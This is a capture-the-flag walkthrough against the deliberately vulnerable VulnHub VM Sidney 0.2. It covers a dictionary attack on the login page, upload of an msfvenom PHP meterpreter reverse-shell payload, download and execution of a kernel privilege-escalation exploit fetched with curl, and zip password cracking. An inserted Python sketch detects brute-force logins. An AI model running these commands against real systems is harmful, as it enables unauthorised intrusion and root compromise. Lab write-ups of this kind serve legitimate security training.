Hack the Sidney VM (CTF Challenge)

Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2, made by Nightmares. This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you will need to snag the flag. You can download this VM from https://www.vulnhub.com/entry/sidney-02,149/
First, we need to find out which IP address the VM was given, so we scan the network using:

Now that we have located our target IP, our next step is to scan it.
nmap -A -p-

The scan shows that port 80 is open, which means the target serves a web page, so let us open the IP in the browser.

Opening the target IP in the browser did not give us much information, so we will use the curl command to find out more about our target.

curl -v

Now if you look at the source code, you can see that the word “commodore64” is used a lot. So we opened it in the browser and, to our luck, found another page.

Then we decided to look into its page source.

As you read the page source you will learn that the username is robhubbard, and going further you will find some hints about the password:
  • the password is in lowercase
  • password has 3 letters and four digits
  • and it is related to c=64 sound chip
After looking into the page source we explored the site further with nikto.
nikto -h
Exploring with nikto proved helpful, as it found an index.php file. We opened it and, as you can see, it asks for a username and password. We already know the username; we just have to find the password.

With the above hints about the password, we first decided to look up the c=64 sound chip on Wikipedia. And we found:

We knew that the password's first three characters are letters, so our best guess is that MOS makes up the first three characters of the password.
Now everything depends on the last four digits of the password, and to find them we used the crunch command.
crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt

Crunch will generate your dictionary file.
Then run a dictionary attack using Burp Suite, which will reveal the password as shown below:
Now enter the username and password on the index.php page. The following page will open, and on this page you have to upload a malicious PHP file.
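
Seen from the defender's side, a dictionary run like the one above appears in the web server's access log as a burst of failed logins from a single address. The sketch below is an added example, not part of the original walkthrough, and flags that pattern; the log lines, the `/login/index.php` path, the 401 failure status and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/login/index.php"  # assumption: placeholder for the protected page
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Return (ip, timestamp, path, status), or None for a malformed line."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?")[0], int(m["status"])

def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60),
                    failure_statuses=(401,)):
    """Map each source IP to its peak count of failed logins inside `window`,
    for sources that reach `threshold`. Each source's lines must be in time order."""
    recent = defaultdict(deque)
    flagged = {}
    for rec in filter(None, map(parse, lines)):
        ip, ts, path, status = rec
        if path != LOGIN_PATH or status not in failure_statuses:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:      # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

def sample_log():
    """Constructed log: one source cycling candidates, one user who mistypes twice."""
    base = datetime(2016, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
    def line(ip, offset, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "GET {LOGIN_PATH} HTTP/1.1" {status} 512 "-" "-"'
    burst = [line("192.0.2.10", i // 10, 401) for i in range(200)]
    user = [line("192.0.2.20", 5, 401), line("192.0.2.20", 9, 401),
            line("192.0.2.20", 14, 200)]
    return burst + user + ["not a log line"]

if __name__ == "__main__":
    for ip, peak in find_bruteforce(sample_log()).items():
        print(f"{ip}: {peak} failed logins within 60 s")
```

The crunch mask above yields only 10,000 candidates, so even a low threshold trips long before the list is exhausted; rate limiting or lockout on the login page is the matching control.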

After entering the password you will be logged on to the following page:

Now, to generate the said PHP file, open the terminal in your Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with a .php extension. Now upload this file by browsing to it on the webpage.
Simultaneously, open Metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4444
Executing the above exploit gives us a meterpreter session. Further type:
If you then type the following two commands to spawn a terminal through a Python file, they will not work, as the version of Python is updated:
echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py
To solve this problem you need to run a different set of commands:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now you will reach the terminal. Here, type the following command to identify the release the target is running, which tells us its kernel version:
lsb_release -a

Now that we know the kernel's version, we will search for an exploit for it on www.exploit-db.com

On the exploit's page you will find the link to download it.

Now that we have the exploit to download, we need a writable directory to download it into. To find one, type:
find / -writable -type d 2>/dev/null
Then move into that directory by typing:
cd /tmp
In the /tmp folder, trying to download a file with the wget command shows an error, so we have to use the curl command this time:

curl -O https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip

Now unzip the file by typing:
unzip 39772.zip

Move into the unzipped directory by typing:
cd 39772
Now we have a tar file named exploit.tar. Extract it with the following command:
tar -xvf exploit.tar
And now move into the directory that contains doubleput.c by typing:
cd ebpf_mapfd_doubleput_exploit

Moving forward, type:
ls (lists the directory contents)
./compile.sh (runs compile.sh, which builds the exploit)
./doubleput (runs the binary built from doubleput.c)
whoami (shows which user you are now running as)
cd /root (takes you into /root)
ls (shows the contents of /root)

Now we are root on our target. Let's see what it has to offer us; for that, type:
ls -lsa
We have all the files listed, and from the list we will try to open hint.gif. First we have to copy it to the web root, so type:
cp hint.gif /var/www/html

Now if you open hint.gif in the browser, it will show you the following image:

So we will check the other files too, like commodore64. Type:
cd .commodore64
And again, to see what it has to offer us, type:
ls -lsa
From all the files listed we will open the following:
cd .miami
ls -lsa (lists the contents further)
cd vice (enters vice)

Don't get too excited that we have obtained the flag. We still have to open it. And here is the trick: if you try to open the zip file, it will ask you for a password. So we will fetch it through the browser, and for that we first have to copy it, so type:
cp flag.zip /var/www/html/commodore64

When you open it in the browser, it will prompt you to download flag.zip. So, download it.

We will run a dictionary attack using rockyou.txt; the command for this is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip

And yes, at last you have the password. So now unzip flag.zip by typing:
unzip flag.zip
It will then ask you for the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy it.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast